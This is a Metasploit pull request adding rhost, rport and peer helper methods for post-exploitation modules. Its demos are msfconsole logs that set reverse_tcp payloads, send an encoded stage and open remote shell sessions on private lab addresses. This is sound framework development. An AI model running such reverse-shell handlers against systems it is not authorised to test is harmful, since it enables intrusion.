### PR TITLE
Add method rhost, rport, and peer for post modules

### DIFF
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -2,6 +2,28 @@
 
 module Msf::Post::Common
 
+  def rhost
+    case session.type
+    when 'meterpreter'
+      session.sock.peerhost
+    when 'shell'
+      session.session_host
+    end
+  end
+
+  def rport
+    case session.type
+    when 'meterpreter'
+      session.sock.peerport
+    when 'shell'
+      session.session_port
+    end
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
   #
   # Checks if the remote system has a process with ID +pid+
   #


### PR DESCRIPTION
[SeeRM #8761]

This PR adds the following methods:
- rhost - returns the target IP for either meterpreter or shell session
- rport - returns the target port for either meterpreter or shell session
- peer - returns the target IP and port for either meterpreter or shell session

Verification Steps:
- [x] Get the test script here and put it in your post mod directory: https://gist.github.com/wchen-r7/55a9de47cbb2e01cd114
- [x] Fire up a meterpreter session such as windows/meterpreter/reverse_tcp
- [x] Confirm that you see rhost, rport, and peer
- [x] Fire up a shell session such as windows/shell/reverse_tcp
- [x] Confirm that you see rhost, rport, and peer as well.

Demos (win and osx, meterpreter and shell):

```
$ msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.0.1.84
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.84:4082) at 2014-02-03 01:02:23 -0600

meterpreter > run post/windows/gather/test

[!] 10.0.1.84
[!] 4082
[!] 10.0.1.84:4082
```

```
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
msf exploit(handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.1.84
[*] Command shell session 2 opened (10.0.1.76:4444 -> 10.0.1.84:4083) at 2014-02-03 01:03:17 -0600

msf exploit(handler) > use post/windows/gather/test
msf post(test) > set session 2
session => 2
msf post(test) > run

[!] 10.0.1.84
[!] 4083
[!] 10.0.1.84:4083
```

```
$ msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > set payload osx/x64/shell_reverse_tcp
payload => osx/x64/shell_reverse_tcp
msf exploit(handler) > set lhost 10.0.1.76
lhost => 10.0.1.76
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
msf exploit(handler) > [*] Command shell session 1 opened (10.0.1.76:4444 -> 10.0.1.76:58782) at 2014-02-03 01:05:02 -0600

msf exploit(handler) > use post/windows/gather/test
msf post(test) > set session 1
session => 1
msf post(test) > run

[!] 10.0.1.76
[!] 58782
[!] 10.0.1.76:58782
```
